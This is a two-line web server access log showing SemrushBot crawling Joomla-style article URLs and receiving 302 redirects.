185.191.171.13 - - [08/Mar/2023:13:04:16 +0100] "GET /index.php?Itemid=3&id=277&lang=en&option=com_content&view=article HTTP/1.1" 302 545 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.9 - - [08/Mar/2023:13:04:32 +0100] "GET /index.php?Itemid=3&id=357&lang=en&option=com_content&view=article HTTP/1.1" 302 545 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
